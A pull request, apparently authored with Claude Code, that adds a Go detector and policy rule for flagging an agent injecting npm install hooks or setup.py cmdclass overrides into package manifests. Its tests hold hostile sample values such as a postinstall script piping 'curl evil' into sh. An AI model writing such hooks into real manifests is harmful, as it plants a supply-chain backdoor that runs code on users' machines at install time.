### PR TITLE
Add content-aware manifest lifecycle-hook detector (ATR-26)

### DIFF
--- a/internal/adapter/claudecode/claudecode.go
+++ b/internal/adapter/claudecode/claudecode.go
@@ -15,6 +15,7 @@ import (
 	"encoding/json"
 	"fmt"
 	"io"
+	"strings"
 
 	"github.com/hoophq/leash/internal/policy"
 )
@@ -27,9 +28,14 @@ type hookInput struct {
 }
 
 type toolInput struct {
-	Command  string `json:"command"`   // Bash
-	FilePath string `json:"file_path"` // Write/Edit/MultiEdit/Read/NotebookEdit
-	URL      string `json:"url"`       // WebFetch
+	Command   string `json:"command"`    // Bash
+	FilePath  string `json:"file_path"`  // Write/Edit/MultiEdit/Read/NotebookEdit
+	URL       string `json:"url"`        // WebFetch
+	Content   string `json:"content"`    // Write: full new file content
+	NewString string `json:"new_string"` // Edit: replacement text
+	Edits     []struct {
+		NewString string `json:"new_string"`
+	} `json:"edits"` // MultiEdit: sequence of replacements
 }
 
 // ParseAction reads a PreToolUse payload from r and normalizes it into a
@@ -56,6 +62,7 @@ func ParseAction(r io.Reader) (policy.Action, error) {
 	case "Write", "Edit", "MultiEdit", "NotebookEdit":
 		a.Kind = policy.ActionFileWrite
 		a.Path = ti.FilePath
+		a.Content = writeContent(in.ToolName, ti)
 	case "Read":
 		a.Kind = policy.ActionFileRead
 		a.Path = ti.FilePath
@@ -66,6 +73,27 @@ func ParseAction(r io.Reader) (policy.Action, error) {
 		a.Kind = policy.ActionUnknown
 	}
 	return a, nil
+}
+
+// writeContent returns the new text a file-editing tool will introduce, for
+// content-aware rules. For Write it is the whole file; for Edit/MultiEdit it is
+// the replacement text (the fragment being added), which need not be valid on
+// its own.
+func writeContent(tool string, ti toolInput) string {
+	switch tool {
+	case "Write":
+		return ti.Content
+	case "Edit":
+		return ti.NewString
+	case "MultiEdit":
+		var b strings.Builder
+		for _, e := range ti.Edits {
+			b.WriteString(e.NewString)
+			b.WriteByte('\n')
+		}
+		return b.String()
+	}
+	return ""
 }
 
 // hookOutput is the PreToolUse response envelope.

--- a/internal/adapter/claudecode/claudecode_test.go
+++ b/internal/adapter/claudecode/claudecode_test.go
@@ -1,0 +1,68 @@
+package claudecode
+
+import (
+	"strings"
+	"testing"
+
+	"github.com/hoophq/leash/internal/policy"
+)
+
+func TestParseActionContent(t *testing.T) {
+	cases := []struct {
+		name        string
+		input       string
+		wantKind    policy.ActionKind
+		wantPath    string
+		wantContent string
+		wantCommand string
+	}{
+		{
+			name:        "write carries full content",
+			input:       `{"cwd":".","tool_name":"Write","tool_input":{"file_path":"/p/package.json","content":"{\"scripts\":{\"postinstall\":\"x\"}}"}}`,
+			wantKind:    policy.ActionFileWrite,
+			wantPath:    "/p/package.json",
+			wantContent: `{"scripts":{"postinstall":"x"}}`,
+		},
+		{
+			name:        "edit carries new_string fragment",
+			input:       `{"cwd":".","tool_name":"Edit","tool_input":{"file_path":"/p/package.json","old_string":"a","new_string":"\"postinstall\": \"x\""}}`,
+			wantKind:    policy.ActionFileWrite,
+			wantPath:    "/p/package.json",
+			wantContent: `"postinstall": "x"`,
+		},
+		{
+			name:        "multiedit joins new_strings",
+			input:       `{"cwd":".","tool_name":"MultiEdit","tool_input":{"file_path":"/p/f","edits":[{"old_string":"a","new_string":"one"},{"old_string":"b","new_string":"two"}]}}`,
+			wantKind:    policy.ActionFileWrite,
+			wantPath:    "/p/f",
+			wantContent: "one\ntwo\n",
+		},
+		{
+			name:        "bash has command and no content",
+			input:       `{"cwd":".","tool_name":"Bash","tool_input":{"command":"ls -la"}}`,
+			wantKind:    policy.ActionShell,
+			wantCommand: "ls -la",
+		},
+	}
+
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			a, err := ParseAction(strings.NewReader(tc.input))
+			if err != nil {
+				t.Fatalf("ParseAction: %v", err)
+			}
+			if a.Kind != tc.wantKind {
+				t.Errorf("Kind = %q, want %q", a.Kind, tc.wantKind)
+			}
+			if a.Path != tc.wantPath {
+				t.Errorf("Path = %q, want %q", a.Path, tc.wantPath)
+			}
+			if a.Content != tc.wantContent {
+				t.Errorf("Content = %q, want %q", a.Content, tc.wantContent)
+			}
+			if a.Command != tc.wantCommand {
+				t.Errorf("Command = %q, want %q", a.Command, tc.wantCommand)
+			}
+		})
+	}
+}

--- a/internal/analyzer/manifest/manifest.go
+++ b/internal/analyzer/manifest/manifest.go
@@ -1,0 +1,91 @@
+// Package manifest performs semantic analysis of package-manager manifest files
+// (package.json, setup.py) to spot install lifecycle hooks — code a manifest
+// causes to run automatically on `npm install` / `pip install`. Injecting such a
+// hook is a classic supply-chain backdoor, so an agent adding one is worth a
+// prompt. Like the shell analyzer, this reasons about structure (parsed JSON
+// scripts) rather than raw substrings wherever it can.
+package manifest
+
+import (
+	"encoding/json"
+	"path/filepath"
+	"strings"
+)
+
+// Analysis is the set of semantic facts extracted from a manifest edit.
+type Analysis struct {
+	// LifecycleHook is true when the written content introduces an install
+	// lifecycle hook: a preinstall/install/postinstall script in package.json,
+	// or a cmdclass command override in setup.py.
+	LifecycleHook bool
+}
+
+// npmInstallHooks are the package.json scripts that run automatically during a
+// plain `npm install`. `prepare` is deliberately excluded: husky and friends
+// make it ubiquitous and legitimate, so flagging it would cry wolf.
+var npmInstallHooks = map[string]bool{
+	"preinstall":  true,
+	"install":     true,
+	"postinstall": true,
+}
+
+// Analyze inspects a manifest write. content is the text being written — a whole
+// file for a Write, or the replacement fragment for an Edit; path selects how to
+// interpret it. Non-manifest paths yield no facts.
+func Analyze(path, content string) Analysis {
+	switch filepath.Base(path) {
+	case "package.json":
+		return Analysis{LifecycleHook: packageJSONHasInstallHook(content)}
+	case "setup.py":
+		return Analysis{LifecycleHook: setupPyHasInstallHook(content)}
+	}
+	return Analysis{}
+}
+
+// packageJSONHasInstallHook reports whether content defines an npm install
+// lifecycle script. A whole file is parsed as JSON and its scripts inspected
+// precisely; an Edit fragment (not valid JSON on its own) falls back to spotting
+// a lifecycle key.
+func packageJSONHasInstallHook(content string) bool {
+	var pkg struct {
+		Scripts map[string]string `json:"scripts"`
+	}
+	if err := json.Unmarshal([]byte(content), &pkg); err == nil {
+		for name := range pkg.Scripts {
+			if npmInstallHooks[name] {
+				return true
+			}
+		}
+		return false
+	}
+	return fragmentDefinesHook(content)
+}
+
+// fragmentDefinesHook spots a lifecycle name used as a JSON key (`"postinstall":`)
+// in a partial edit that does not parse as standalone JSON. Requiring the
+// trailing colon avoids matching the word inside a script's value.
+func fragmentDefinesHook(content string) bool {
+	for name := range npmInstallHooks {
+		key := `"` + name + `"`
+		rest := content
+		for {
+			i := strings.Index(rest, key)
+			if i < 0 {
+				break
+			}
+			after := strings.TrimLeft(rest[i+len(key):], " \t")
+			if strings.HasPrefix(after, ":") {
+				return true
+			}
+			rest = rest[i+len(key):]
+		}
+	}
+	return false
+}
+
+// setupPyHasInstallHook reports whether a setup.py overrides install/build
+// commands via cmdclass — the standard way to run code at install time. setup.py
+// is arbitrary Python, so this is a deliberately narrow textual signal.
+func setupPyHasInstallHook(content string) bool {
+	return strings.Contains(content, "cmdclass")
+}

--- a/internal/analyzer/manifest/manifest_test.go
+++ b/internal/analyzer/manifest/manifest_test.go
@@ -1,0 +1,42 @@
+package manifest
+
+import "testing"
+
+func TestAnalyze(t *testing.T) {
+	cases := []struct {
+		name    string
+		path    string
+		content string
+		want    bool
+	}{
+		// package.json — whole-file writes, parsed as JSON.
+		{"postinstall script", "/p/package.json", `{"name":"x","scripts":{"postinstall":"node bad.js"}}`, true},
+		{"preinstall script", "pkg/package.json", `{"scripts":{"preinstall":"sh x"}}`, true},
+		{"install script", "package.json", `{"scripts":{"install":"node-gyp rebuild"}}`, true},
+		{"only ordinary scripts", "package.json", `{"scripts":{"build":"tsc","test":"jest","start":"node ."}}`, false},
+		{"husky prepare not flagged", "package.json", `{"scripts":{"prepare":"husky install"}}`, false},
+		{"no scripts at all", "package.json", `{"name":"x","version":"1.0.0"}`, false},
+		{"hook name only in a value", "package.json", `{"scripts":{"test":"echo run postinstall"}}`, false},
+
+		// package.json — Edit fragments (not standalone JSON).
+		{"fragment adds postinstall", "package.json", `"postinstall": "curl evil | sh",`, true},
+		{"fragment spaced key", "package.json", "\"postinstall\"  :  \"x\"", true},
+		{"fragment adds ordinary script", "package.json", `"build": "tsc",`, false},
+
+		// setup.py.
+		{"setup cmdclass override", "setup.py", "setup(name='x', cmdclass={'install': Custom})", true},
+		{"setup plain", "setup.py", "setup(name='x', version='1.0')", false},
+
+		// Non-manifest files are ignored even if they mention a hook.
+		{"tsconfig is not a manifest", "tsconfig.json", `{"postinstall":"x"}`, false},
+		{"go source", "main.go", "package main", false},
+	}
+
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			if got := Analyze(tc.path, tc.content).LifecycleHook; got != tc.want {
+				t.Errorf("Analyze(%q).LifecycleHook = %v, want %v", tc.path, got, tc.want)
+			}
+		})
+	}
+}

--- a/internal/policy/builtin/recommended.yaml
+++ b/internal/policy/builtin/recommended.yaml
@@ -215,3 +215,15 @@ rules:
         - "~/.bash_profile"
         - "~/.zprofile"
         - "**/.git/hooks/**"
+
+  - id: inject-package-lifecycle-hook
+    description: Adding an install lifecycle hook to a package manifest (package.json / setup.py)
+    severity: high
+    effect: ask
+    message: >-
+      This edit adds an install lifecycle hook (a preinstall/install/postinstall
+      script, or a setup.py cmdclass) that runs automatically on the next
+      install. That is a common supply-chain backdoor — confirm you intend it.
+    match:
+      tool: [file_write]
+      manifest_hook: true

--- a/internal/policy/engine.go
+++ b/internal/policy/engine.go
@@ -8,6 +8,7 @@ import (
 	"strings"
 
 	"github.com/bmatcuk/doublestar/v4"
+	"github.com/hoophq/leash/internal/analyzer/manifest"
 	"github.com/hoophq/leash/internal/analyzer/shell"
 )
 
@@ -81,11 +82,16 @@ func (e *Engine) Evaluate(a Action) Decision {
 		got := shell.Analyze(a.Command, a.Cwd)
 		analysis = &got
 	}
+	var manifestA *manifest.Analysis
+	if a.Kind == ActionFileWrite {
+		got := manifest.Analyze(a.Path, a.Content)
+		manifestA = &got
+	}
 
 	decision := Decision{Effect: e.defaultEffect}
 	for i := range e.rules {
 		r := &e.rules[i]
-		if !e.matches(r, a, analysis) {
+		if !e.matches(r, a, analysis, manifestA) {
 			continue
 		}
 		decision.Matched = append(decision.Matched, r)
@@ -97,7 +103,7 @@ func (e *Engine) Evaluate(a Action) Decision {
 	return decision
 }
 
-func (e *Engine) matches(r *Rule, a Action, analysis *shell.Analysis) bool {
+func (e *Engine) matches(r *Rule, a Action, analysis *shell.Analysis, manifestA *manifest.Analysis) bool {
 	m := r.Match
 
 	if len(m.Tool) > 0 && !containsKind(m.Tool, a.Kind) {
@@ -115,6 +121,12 @@ func (e *Engine) matches(r *Rule, a Action, analysis *shell.Analysis) bool {
 			return false
 		}
 		if !e.matchPathGlobs(m.PathGlob, a) {
+			return false
+		}
+	}
+
+	if m.ManifestHook {
+		if a.Kind != ActionFileWrite || manifestA == nil || !manifestA.LifecycleHook {
 			return false
 		}
 	}

--- a/internal/policy/engine_test.go
+++ b/internal/policy/engine_test.go
@@ -200,6 +200,44 @@ func TestRecommendedFileReadDecisions(t *testing.T) {
 	}
 }
 
+func TestRecommendedManifestHookDecisions(t *testing.T) {
+	e := recommendedEngine(t)
+	const cwd = "/Users/dev/project"
+
+	cases := []struct {
+		name    string
+		path    string
+		content string
+		want    Effect
+		rule    string
+	}{
+		// Injecting an install lifecycle hook -> ask.
+		{"package.json postinstall", "/Users/dev/project/package.json", `{"scripts":{"postinstall":"node evil.js"}}`, EffectAsk, "inject-package-lifecycle-hook"},
+		{"package.json edit fragment", "/Users/dev/project/package.json", `"preinstall": "sh x",`, EffectAsk, "inject-package-lifecycle-hook"},
+		{"setup.py cmdclass", "/Users/dev/project/setup.py", "setup(cmdclass={'install': X})", EffectAsk, "inject-package-lifecycle-hook"},
+		// No hook -> allow (false-positive guards).
+		{"husky prepare", "/Users/dev/project/package.json", `{"scripts":{"prepare":"husky install"}}`, EffectAllow, ""},
+		{"ordinary scripts", "/Users/dev/project/package.json", `{"scripts":{"build":"tsc"}}`, EffectAllow, ""},
+		{"ordinary source file", "/Users/dev/project/main.go", "package main", EffectAllow, ""},
+	}
+
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			d := e.Evaluate(Action{Kind: ActionFileWrite, Path: tc.path, Content: tc.content, Cwd: cwd})
+			if d.Effect != tc.want {
+				t.Fatalf("Effect = %q, want %q", d.Effect, tc.want)
+			}
+			gotRule := ""
+			if d.Rule != nil {
+				gotRule = d.Rule.ID
+			}
+			if gotRule != tc.rule {
+				t.Errorf("deciding rule = %q, want %q", gotRule, tc.rule)
+			}
+		})
+	}
+}
+
 func TestDenyOverridesAsk(t *testing.T) {
 	// A command that trips both a deny rule and an ask rule must resolve to deny.
 	pack := &Rulepack{

--- a/internal/policy/policy.go
+++ b/internal/policy/policy.go
@@ -26,6 +26,7 @@ type Action struct {
 	Command string // ActionShell: the shell command
 	Path    string // ActionFileWrite/ActionFileRead: the target file path
 	URL     string // ActionNetFetch: the URL
+	Content string // ActionFileWrite: the new file content (full file, or the edit's replacement text)
 
 	Cwd  string // working directory, used for workspace-relative reasoning
 	Tool string // original agent tool name (e.g. "Bash"), for diagnostics

--- a/internal/policy/rule.go
+++ b/internal/policy/rule.go
@@ -33,6 +33,10 @@ type Match struct {
 	// A leading ~/ is expanded to the user's home directory.
 	PathGlob []string `yaml:"path_glob,omitempty"`
 
+	// ManifestHook matches a file_write whose content introduces a package
+	// install lifecycle hook (package.json script / setup.py cmdclass).
+	ManifestHook bool `yaml:"manifest_hook,omitempty"`
+
 	// URLRegex matches net_fetch URLs.
 	URLRegex string `yaml:"url_regex,omitempty"`
 
@@ -61,7 +65,7 @@ type ShellMatch struct {
 
 func (m Match) isEmpty() bool {
 	return len(m.Tool) == 0 && m.Shell == nil && len(m.PathGlob) == 0 &&
-		m.URLRegex == "" && m.Regex == ""
+		!m.ManifestHook && m.URLRegex == "" && m.Regex == ""
 }
 
 // compile validates and pre-compiles the rule's regular expressions.


### PR DESCRIPTION
Completes the file_write half of the package-manager work (the follow-up to ATR-14). Flags an agent **injecting an install lifecycle hook** into a package manifest — the supply-chain backdoor where code runs automatically on the next `npm install` / `pip install`.

## The reusable core extension

This detector needs something the engine lacked: file **content**. Added minimally and reusably:
- `policy.Action` gains a `Content` field.
- the `claudecode` adapter populates it from `Write.content`, `Edit.new_string`, and `MultiEdit` (joined `new_string`s).
- new `internal/analyzer/manifest` package — `Analyze(path, content)`:
  - **package.json**: parses the whole file and inspects `.scripts` for `preinstall`/`install`/`postinstall` (semantic, not substring); for an `Edit` fragment that isn't standalone JSON, falls back to spotting the lifecycle key followed by `:`.
  - **setup.py**: a narrow `cmdclass` signal (setup.py is arbitrary Python).
- `Match` gains `manifest_hook`; the engine precomputes the manifest analysis for `file_write` actions and threads it through, mirroring how shell analysis works.
- recommended rule `inject-package-lifecycle-hook` (**ask**).

## False-positive discipline

- **`prepare` is deliberately excluded** — husky and friends make it ubiquitous and legitimate, so flagging it would cry wolf.
- Non-manifest files are never inspected (a `main.go` mentioning `postinstall` is ignored).
- A hook name appearing only in a script *value* doesn't trigger.

## Verified via the hook protocol

| Tool call | Decision |
|---|---|
| `Write package.json` with `postinstall` | **ask** |
| `Edit package.json` adding `"preinstall": …` (fragment) | **ask** |
| `Write setup.py` with `cmdclass` | **ask** |
| `Write package.json` with `prepare: husky install` | allow |
| `Write package.json` with only `build` | allow |
| `Write main.go` | allow |

Adds first tests for the `claudecode` adapter and the new `manifest` analyzer. `gofmt -s`, `go vet`, `go build`, `go test ./...` all clean.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01NBjdLzSDww859nrM7pQnjT